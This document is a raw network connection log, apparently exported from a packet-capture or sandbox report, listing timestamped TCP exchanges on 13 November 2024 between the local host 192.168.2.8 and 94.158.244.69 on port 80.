                                                        Nov 13, 2024 10:55:02.213769913 CET4971080192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:02.218744040 CET804971094.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:02.503761053 CET4971280192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:02.510034084 CET804971294.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:02.510107040 CET4971280192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:02.510430098 CET4971280192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:02.510850906 CET4971280192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:02.515261889 CET804971294.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:02.515707016 CET804971294.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:10.989110947 CET804971294.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:10.989197016 CET4971280192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:10.989314079 CET4971280192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:10.994087934 CET804971294.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:11.536524057 CET4971380192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:12.140552044 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.140711069 CET4971380192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:12.140882969 CET4971380192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:12.141294956 CET4971380192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:12.145725012 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.145782948 CET4971380192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:12.146177053 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.146184921 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.146226883 CET4971380192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:12.146230936 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.146240950 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.146249056 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.146281004 CET4971380192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:12.146434069 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.146442890 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.146450043 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.150326967 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.150582075 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.151034117 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.151041985 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.151051998 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.151148081 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.151155949 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:12.193475962 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:20.623872995 CET804971394.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:21.131783009 CET4971480192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:21.136784077 CET804971494.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:21.136852980 CET4971480192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:21.137038946 CET4971480192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:21.137424946 CET4971480192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:21.141801119 CET804971494.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:21.142283916 CET804971494.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:29.613034964 CET804971494.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:29.613116980 CET4971480192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:29.613262892 CET4971480192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:29.618233919 CET804971494.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.291652918 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.296725035 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.296834946 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.297111988 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.297679901 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.301911116 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.301961899 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.302596092 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302606106 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302619934 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302638054 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.302680969 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302700043 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.302720070 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302721977 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.302731037 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302757978 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302759886 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.302769899 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302772045 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.302793980 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.302797079 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.302813053 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.302830935 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.306926012 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.306967974 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.307461977 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.307497025 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.307531118 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.307540894 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.307585001 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.307611942 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.307674885 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.307683945 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.307707071 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.307729959 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.349405050 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.349548101 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.397583008 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.397711039 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.445492983 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.445720911 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.493462086 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.493673086 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.541448116 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.541601896 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.589736938 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.589852095 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.637814045 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.638456106 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.685653925 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.685720921 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.733722925 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.733776093 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.789863110 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.789956093 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.837680101 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.837796926 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.889766932 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.889898062 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.941819906 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.941910028 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:30.989837885 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:30.989959955 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.037894011 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.038005114 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.085778952 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.085937023 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.133856058 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.134032965 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.181941032 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.182086945 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.233573914 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.233721018 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.281909943 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.282004118 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.329576969 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.329735041 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.377865076 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.377928972 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.425841093 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.425905943 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.475281954 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.475409031 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.522768974 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.522890091 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.569875002 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.569986105 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.618604898 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.618735075 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.665704012 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.665812969 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.718069077 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.718204021 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.769758940 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.769848108 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.817666054 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.817945004 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.865817070 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.865966082 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.913568020 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.913753033 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:31.961848974 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:31.961936951 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.010013103 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.010097980 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.066004038 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.066211939 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.117748976 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.117917061 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.169507980 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.169826031 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.221766949 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.221888065 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.273679972 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.273845911 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.329716921 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.329860926 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.377836943 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.377971888 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.426208019 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.426299095 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.478693008 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.478797913 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.525818110 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.525945902 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.574251890 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.574316978 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.623384953 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.623460054 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.675578117 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.675695896 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.727227926 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.727322102 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.779911995 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.780097961 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.831491947 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.831617117 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.877656937 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.877785921 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.925707102 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.925787926 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.973805904 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.973922014 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.025806904 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.025993109 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.073609114 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.073734999 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.125701904 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.125840902 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.177690983 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.177798986 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.229795933 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.229871988 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.277514935 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.277582884 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.325741053 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.325798988 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.377716064 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.377861977 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.425654888 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.425759077 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.473603964 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.473932981 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.521555901 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.521666050 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.569483995 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.569561005 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.617465019 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.617567062 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.665632963 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.665746927 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.713617086 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.713735104 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.765733004 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.765994072 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.813690901 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.813829899 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.861609936 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.861701012 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.913518906 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.913657904 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.965544939 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.965610027 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.013698101 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.013811111 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.061541080 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.061738968 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.109529972 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.109608889 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.157587051 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.157876968 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.205861092 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.206125975 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.253453970 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.253562927 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.301587105 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.301660061 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.353949070 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.354094982 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.406111956 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.406259060 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.453567028 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.453676939 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.501481056 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.501528025 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.550652027 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.550715923 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.598159075 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.598285913 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.649688005 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.649779081 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.703100920 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.703222036 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.749491930 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.749645948 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.808661938 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.808734894 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.860554934 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.860610008 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.913536072 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.913605928 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.984792948 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.984859943 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.042498112 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.042587996 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.090212107 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.090291023 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.141807079 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.141882896 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.190093040 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.190167904 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.237761974 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.238054037 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.285773993 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.286053896 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.334119081 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.334228039 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.385787010 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.385931015 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.437597036 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.437715054 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.486393929 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.486555099 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.533603907 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.533729076 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.581623077 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.581692934 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.629690886 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.629792929 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.687733889 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.687834024 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.755968094 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.756047964 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.804630995 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.804706097 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.856118917 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.856311083 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.905597925 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.905850887 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.962383986 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.962466955 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.012538910 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.012675047 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.061717033 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.061861992 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.109647036 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.109786987 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.159933090 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.160048008 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.209794998 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.209896088 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.258187056 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.258394957 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.312061071 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.312257051 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.365536928 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.365632057 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.417045116 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.417110920 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.465673923 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.465779066 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.518044949 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.518131971 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.570043087 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.570240974 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.618827105 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.619035959 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.666529894 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.666702032 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.713618994 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.713711977 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.765539885 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.765721083 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.813925028 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.813994884 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.865546942 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.865647078 CET4971580192.168.2.894.158.244.69
